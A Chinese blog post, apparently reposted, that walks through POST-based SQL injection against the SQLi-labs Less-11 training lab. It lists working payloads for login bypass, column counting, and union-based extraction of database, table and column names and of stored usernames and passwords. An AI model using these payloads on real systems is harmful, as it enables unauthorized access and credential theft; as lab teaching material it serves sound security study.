SQL注入 - POST注入方法

这篇具有很好参考价值的文章主要介绍了SQL注入 - POST注入方法。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


什么是post呢?
( 就是数据从客户端提交到服务器端,例如我们在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,提交到服务器后服务器再进行验证。这就是一次post的过程的。)

POST和GET得区别
(POST不会在URL栏里面显示 传参可以很长 不会进行URL编码 GET注入传参在URL栏 POST注入传参在表单)

靶场:SQL labs - Less-11

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

注入流程

正常尝试弱口令登录

username = admin
password = 123456

发现页面不回显

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

判断是否存在注入,是否会将用户输入拼接到sql语句,并当做代码执行

username = admin or 1=1
password = 123456

发现页面还是不回显任何东西

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

尝试是否需要闭合语句

username = admin'or'1'='1
password = 123456

发现登录成功。

那么原因是什么呢,因为即使admin不成立那后面得 or 1=1 恒等式成立,那么这条语句也是成立的并且把用户得传参当成了代码执行了所以存在POST注入类型得sql注入漏洞。

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

尝试注释掉后面得语句

username = admin'--+
password = 123456

发现报错了,通过报错可以猜测正常得SQL语句为以下:
@$sql="SELECT username, password FROM users WHERE username='admin' and password='$passwd' LIMIT 0,1";

由于我们得目的不是为了报错,而是为了注释掉后面得语句并且语句能正常运行,正常情况下应该是不会报错得,所以我这边猜测是过滤了 ‘–+’ 注释符,尝试 ‘#’ 注释符发现页面正常

username = admin'#
password = 123456

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql
SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

判断字段数

username = admin'and'1'='2' order by 1 #
username = admin'and'1'='2' order by 2 #
username = admin'and'1'='2' order by 3 #

发现到3得时候报错了,由此判断字段数为2

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

判断显错位

username = admin'and'1'='2' union select 1,2 #

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

判断当前数据库名

username = admin'and'1'='2' union select 1,database() #

发现当前数据库名为'security'

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

判断当前数据库下的表名

username = admin'and'1'='2' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

发现存在 'emails,referers,uagents,users' 表

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

判断当前数据库下users表的列名

username = admin'and'1'='2' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #

发现存在'username''password'列

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql

获取’username’'password’具体数据

username = admin'and'1'='2' union select 1,group_concat(username,password) from users #

SQL注入 - POST注入方法,WEB安全基础,漏洞复现,网络安全,渗透测试,漏洞复现,sql,mysql文章来源地址https://www.toymoban.com/news/detail-684185.html

到了这里,关于SQL注入 - POST注入方法的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】SQL注入漏洞的修复建议

    SQL注入是Web应用程序常见的安全漏洞之一,攻击者通过恶意构造的SQL查询语句,成功在应用程序的数据库中执行任意操作,导致数据泄露、篡改或其他安全问题。 本篇技术博客将详细介绍SQL注入漏洞的修复建议,包括过滤危险字符和使用预编译语句,通过具体的代码案例帮助

    2024年02月06日
    浏览(50)
  • 28、web攻防——通用漏洞&SQL注入&HTTP头XFF&COOKIE&POST请求

    $_GET :接收get请求,传输少量数据,URL是有长度限制的; $_POST :接收post请求; $_COOKIE :接收cookie,用于身份验证; $_REQUEST :收集通过 GET 、POST和COOKIE 方法发送的表单数据; $_SERVER :接收数据包中的一些内容,如浏览器信息、当前访问url地址等; 网站功能点: 后台要记录

    2024年01月19日
    浏览(54)
  • 亿赛通电子文档安全管理系统 SQL注入漏洞复现

    亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加

    2024年02月03日
    浏览(38)
  • 网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

    目录 一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用 二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化 (1)主机 表1  主机 系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态

    2024年04月26日
    浏览(37)
  • Web安全:SQL注入漏洞测试.

    SQL注入就是 有些 恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容 中,同时程序的本身对用户输入的内容过于相信, 没有对用户插入的SQL语句进行任何的过滤 ,从而 直接被SQL语句直接被服务端执行 ,导致数据库的原有信息泄露,篡改,甚至被删除等风险。 SQL注

    2024年02月05日
    浏览(54)
  • Web安全:SQL注入漏洞测试(防止 黑客利用此漏洞.)

    SQL注入就是 有些 恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容 中,同时程序的本身对用户输入的内容过于相信, 没有对用户插入的SQL语句进行任何的过滤 ,从而 直接被SQL语句直接被服务端执行 ,导致数据库的原有信息泄露,篡改,甚至被删除等风险。 SQL注

    2024年02月13日
    浏览(39)
  • web安全漏洞-SQL注入攻击实验

    实验目的 学习sql显注的漏洞判断原理 掌握sqlmap工具的使用 分析SQL注入漏洞的成因 实验工具 sqlmap是用python写的开源的测试框架,支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP,MAXDB并支持6种SQL注入手段。 实验内容 SQL注入(SQL I

    2024年02月06日
    浏览(55)
  • Web安全 SQL注入漏洞测试.(可以 防止恶意用户利用漏洞)

    SQL注入就是 有些 恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容 中,同时程序的本身对用户输入的内容过于相信, 没有对用户插入的SQL语句进行任何的过滤 ,从而 直接被SQL语句直接被服务端执行 ,导致数据库的原有信息泄露,篡改,甚至被删除等风险。 SQL注

    2023年04月20日
    浏览(47)
  • WEB安全之XSS漏洞与SQL注入漏洞介绍及解决方案

    这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,比较适合初学者观看。 对于防止sql注入发生,我在这里用简单拼接字符串的注入及参数化查询,如果大家对这个系列的内容感兴趣,可以在评论区告诉我! XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者

    2024年02月07日
    浏览(46)
  • 网络安全全栈培训笔记(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&资源处理拒绝服务)

    知识点: 1、CRLF注入-原理检测利用 2、URL重定向-原理检测利用 3、Web拒绝服务-原理检测利用 #下节预告: 1、JSONPCORS跨域 2、域名安全接管劫持 #详细点: 1.CRLF注入漏洞,是因为Wb应用没有对用户输入做严格验证,导致攻击者可以输入一些 恶意字符。攻击者一旦向清求行或首部

    2024年01月15日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包